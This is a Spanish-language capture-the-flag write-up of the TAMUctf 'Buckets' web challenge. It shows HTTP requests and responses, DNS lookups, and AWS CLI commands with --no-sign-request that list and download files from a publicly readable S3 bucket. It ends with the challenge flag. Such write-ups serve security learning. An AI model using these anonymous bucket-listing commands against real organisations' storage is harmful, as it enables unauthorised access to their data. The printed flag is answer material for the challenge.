# Buckets (web)

> http://tamuctf.s3-website-us-west-2.amazonaws.com/
> 
> Difficulty: easy

Pregunto:
```
GET / HTTP/1.1
Host: tamuctf.s3-website-us-west-2.amazonaws.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
```

Responde:
```
HTTP/1.1 200 OK
x-amz-id-2: TQVSh6lesWUcEcTdIlOM0fyMhYf4zrol+dTHcPFI8dziivH9AL/saoylzbrkQS/Kn7RRZGP3aXs=
x-amz-request-id: 436333C685B72966
Date: Sat, 23 Feb 2019 10:47:41 GMT
Last-Modified: Tue, 19 Feb 2019 17:06:49 GMT
ETag: "cd654a6ed564b4546a886d13ecad17af"
Content-Type: text/html
Content-Length: 632
Server: AmazonS3
Connection: close

<!DOCTYPE html>
<!--http://ctfdevbucket.s3-website.us-east-2.amazonaws.com/-->
<html>
<head>
<!--Wow my first AWS web page!
	I think I am finally figuring out S3 buckets,
	it is just really so easy to use!
	If you forget for your passwords it is near the Dogs..-->	
<style>
#DIV {
	background-color: white;
	color: black;
	text-align: center;
}
</style>

<title>AWS Problem</title>
</head>
<body style="background-image:url(doggos3.jpg)">

<div id="DIV">
<h1>Dogs are definitely better than cats</h1>
</div>

<!--If you look around hard enough you might find some dogs, some cats, some animals and some mysteries-->

</body>
</html>
```

Hay una foto con gatos y perros de fondo. Me dice que hay mas animales y
ademas misterios.

Otra request:
```
GET / HTTP/1.1
Host: ctfdevbucket.s3-website.us-east-2.amazonaws.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
```

Ahora responde ligeramente diferente:
```
HTTP/1.1 200 OK
x-amz-id-2: tYlEDwAHSeLDjnNCltHKsq/N8M4Xwo+VEfUbUo0EQlck16wa5K2MKduMpfbjf64ISeGvrJE5GkI=
x-amz-request-id: 5357FC68A605C58A
Date: Sat, 23 Feb 2019 11:23:11 GMT
Last-Modified: Tue, 04 Sep 2018 19:30:22 GMT
ETag: "adb3239c35974e8ebb007a0e911270f5"
Content-Type: text/html
Content-Length: 522
Server: AmazonS3
Connection: close

<!DOCTYPE html>
<!--http://ctfdevbucket.s3-website.us-east-2.amazonaws.com/-->
<html>
<head>
<!--If you forget for your passwords it is near the Dogs..-->	
<style>
#DIV {
	background-color: white;
	color: black;
	text-align: center;
}
</style>

<title>AWS Problem</title>
</head>
<body style="background-image:url(doggos3.jpg)">

<div id="DIV">
<h1>Dogs are definitely better than cats</h1>
</div>

<!--If you look around hard enough you might find some dogs, some cats, some animals and some mysteries-->

</body>
</html>
```

Por las pistas en los comentarios, parece que hay rutas validas con contenido. El problema es encontrar
esas rutas. Revisando la docu de AWS veo que hay una interfax por CLI que es mucho mas comoda para jugar
y scriptear: `https://aws.amazon.com/cli/`

Para instarlarlo:
```
$ pip install awscli --upgrade
$ aws --version
```

Lo primero, identificar los registros asociados al nombre de dominio consultando a servidores DNS:
Identifico de donde viene, que en este caso esta claro:
```
$ host tamuctf.s3-website-us-west-2.amazonaws.com
tamuctf.s3-website-us-west-2.amazonaws.com is an alias for s3-website-us-west-2.amazonaws.com.
s3-website-us-west-2.amazonaws.com has address 52.218.241.171
```

Tambien se puede verificar a la inversa, para comprobar a que region de AWS pertenece:
```
$ host 52.218.241.171
171.241.218.52.in-addr.arpa domain name pointer s3-website-us-west-2.amazonaws.com.
```
En este caso, pertenece a la `us-west-2`. Tambien se puede comprobar descargando el JSON que ofrece el
propio AWS:
```
    ...
    {
      "ip_prefix": "52.218.128.0/17",
      "region": "us-west-2",
      "service": "AMAZON"
    }
    ...
```

El siguiente paso es listar los directorios accesibles:
```
$ aws s3 ls  s3://tamuctf --no-sign-request --region us-west-2
                           PRE Animals/
                           PRE Cats/
                           PRE Dogs/
2019-02-19 12:06:49     124222 doggos3.jpg
2019-02-19 12:06:49        632 index.html
```

Parece que hay carpetas de distintos animales. En este punto ya tenemos una forma de listar el
contenido de todas las posibles rutas accesibles.

Para no alargar mas el proceso pongo la correcta, revisando todas las rutas llego a:
```
$ aws s3 ls  s3://tamuctf/Dogs/ --no-sign-request --region us-west-2
                           PRE CC2B70BD238F48BE29D8F0D42B170127/
2019-02-19 12:06:49       8120 beaglepup.jpeg
2019-02-19 12:06:49        919 pup.html
2019-02-19 12:06:49       6305 puphalloween.jpeg
2019-02-19 12:06:49       7666 pupnerd.jpeg
2019-02-19 12:06:49      17666 pupnerd2.webp
2019-02-19 12:06:49     165653 pups.jpg
```

Sigo por la carpeta con nombre aleatorio:
```
$ aws s3 ls  s3://tamuctf/Dogs/CC2B70BD238F48BE29D8F0D42B170127/ --no-sign-request --region us-west-2
                           PRE CBD2DD691D3DB1EBF96B283BDC8FD9A1/
```

Mas rutas:
```
$ aws s3 ls  s3://tamuctf/Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/ --no-sign-request --region us-west-2
2019-02-19 12:06:51         28 flag.txt
```

Ya veo la flag, para descargarla cambio a la opcion `cp` y le indico la ruta en la que descargarla, tal que:
```
$ aws s3 cp s3://tamuctf/Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt --no-sign-request --region us-west-2 flag.txt
download: s3://tamuctf/Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt to ./flag.txt

$ cat flag.txt 
flag{W0W_S3_BAD_PERMISSIONS}
```

Solucion: `flag{W0W_S3_BAD_PERMISSIONS}`

Fuentes:
- https://ip-ranges.amazonaws.com/ip-ranges.json
- https://docs.aws.amazon.com/general/latest/gr/aws-ip-ranges.html
- https://github.com/mzet-/ctf-writeups/blob/master/flaws.cloud/flaws.cloud.md





